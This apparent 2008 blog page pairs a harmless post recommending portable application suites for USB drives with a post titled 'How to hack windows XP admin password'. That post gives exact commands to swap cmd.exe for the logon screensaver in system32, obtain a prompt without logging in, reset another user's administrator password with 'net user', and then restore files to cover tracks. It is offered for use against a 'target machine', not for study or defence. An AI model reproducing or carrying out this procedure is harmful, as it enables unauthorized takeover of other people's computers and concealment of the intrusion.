FriBiz, Lockerz and LifeClickz Invite

Click on FriBiz and Join Just Post ur Email address
Name:
Email:*
Verification No.:*
contact form faq

Web forms generated by UserSpot Form

Wednesday, July 9, 2008

USB drive as a portable pc


USB flash drive; despite being use as a storage to save and transferring files, could be changed as a portable computer or a portable office that will always accompany you. How’s that? Simple, get a flash drive with a good specification and a collection of portable applications.

There are so many portable software that we could have freely nowadays. Means that we don’t have to rely on commercial software anymore.

Beside as standalone portable software, most of them are integrated as a suite such as PortableApps, winPenPack, U3 or others. PortableApps and winPenPack, both being free, the best and popular for now.

PortableApps.com Suite

Standard Version (260MB) and Lite Version (105MB).

All versions of the PortableApps.com Suite include the integrated PortableApps.com Menu (pictured above) and the PortableApps.com Backup utility along with a set of custom icons, an autoplay configuration, folders and a quick start shortcut. In addition, the packages include:

In addition, the packages include:

  • Mozilla Firefox, Portable Edition (web browser)
  • Mozilla Thunderbird, Portable Edition (email)
  • Mozilla Sunbird, Portable Edition (calendar/tasks)
  • ClamWin Portable (antivirus)
  • Pidgin Portable (instant messaging)
  • Sumatra PDF Portable (PDF reader
  • KeePass Password Safe Portable (password manager)
  • Sudoku Portable (game)
  • Mines-Perfect Portable (game)
  • CoolPlayer+ Portable (audio player)
  • OpenOffice.org Portable* (office suite) /AbiWord Portable for the Lite Version

Download HERE

How to hack windows XP admin password


If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:


cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.


Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks